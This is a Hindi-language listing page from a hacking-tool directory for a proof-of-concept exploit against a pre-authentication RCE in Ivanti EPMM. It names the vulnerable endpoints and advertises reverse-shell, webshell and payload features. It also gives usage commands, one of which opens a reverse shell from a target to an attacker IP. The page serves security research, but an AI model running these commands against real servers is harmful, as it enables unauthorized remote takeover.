Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — # CVE-2026-1281 और CVE-2026-1340 के लिए प्रूफ ऑफ कॉन्सेप्ट - Ivanti EPMM प्री-ऑथ RCE बैश अरिथमेटिक एक्सपैंशन के माध्यम से | Kitploit
उपकरण/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

# CVE-2026-1281 और CVE-2026-1340 के लिए प्रूफ ऑफ कॉन्सेप्ट - Ivanti EPMM प्री-ऑथ RCE बैश अरिथमेटिक एक्सपैंशन के माध्यम से

रिपॉजिटरी देखें
61238 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-1281 और CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ अस्वीकरण: यह PoC केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। स्पष्ट अनुमति के बिना उपयोग अवैध है।

🎯 विवरण

CVE-2026-1281 और CVE-2026-1340 कमजोरियों के शोषण के लिए पूर्ण Proof of Concept (PoC) जो Ivanti Endpoint Manager Mobile (EPMM) को प्रभावित करती हैं। ये कमजोरियाँ Bash Arithmetic Expansion तंत्र के माध्यम से बिना प्रमाणीकरण के दूरस्थ रूप से मनमाना कोड निष्पादन (RCE) की अनुमति देती हैं।

कमजोरियाँ

  • CVE-2026-1281 : /mifs/c/appstore/fob/ एंडपॉइंट में कोड इंजेक्शन
  • CVE-2026-1340 : /mifs/c/aftstore/fob/ एंडपॉइंट में कोड इंजेक्शन
  • CVSS स्कोर : 9.8 (Critical)
  • शोषण : वास्तविक दुनिया में सक्रिय (Zero-Day)

🚀 विशेषताएँ

  • ✅ स्वचालित सत्यापन फ्रेमवर्क (8 परीक्षण)
  • ✅ Pre-Auth RCE शोषण
  • ✅ स्वचालित रिवर्स शेल
  • ✅ वेबशेल तैनाती
  • ✅ 50+ तैयार पेलोड
  • ✅ ब्लू टीम के लिए डिटेक्शन स्क्रिप्ट
  • ✅ पूर्ण दस्तावेज़ीकरण

📦 स्थापना

git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
cd CVE-2026-1281-Ivanti-EPMM-RCE
pip3 install -r requirements.txt
chmod +x *.py

🎯 त्वरित उपयोग

# कमजोरी परीक्षण
python3 exploit.py -t https://target.com -c

# RCE सत्यापन
python3 exploit.py -t https://target.com --test-rce

# रिवर्स शेल
python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444

📚 दस्तावेज़ीकरण

  • पूर्ण README - विस्तृत तकनीकी दस्तावेज़ीकरण
  • उपयोग गाइड - चरण-दर-चरण गाइड
  • पेलोड - 50+ पेलोड का संग्रह
  • रेड टीम गाइड - परिचालन परिदृश्य

🔗 संदर्भ

  • CERT-FR CERTFR-2026-ALE-001
  • Watchtowr Labs Analysis
  • CVE-2026-1281
  • CVE-2026-1340

👤 लेखक

Mehdi Le Deaut - Cybersecurity Consultant | Red Team Specialist

LinkedIn

⚖️ लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत है - अधिक विवरण के लिए LICENSE फ़ाइल देखें।

🙏 धन्यवाद

  • त्वरित चेतावनी के लिए CERT-FR
  • तकनीकी विश्लेषण के लिए Watchtowr Labs
  • साइबर सुरक्षा समुदाय
टूल डाउनलोड करें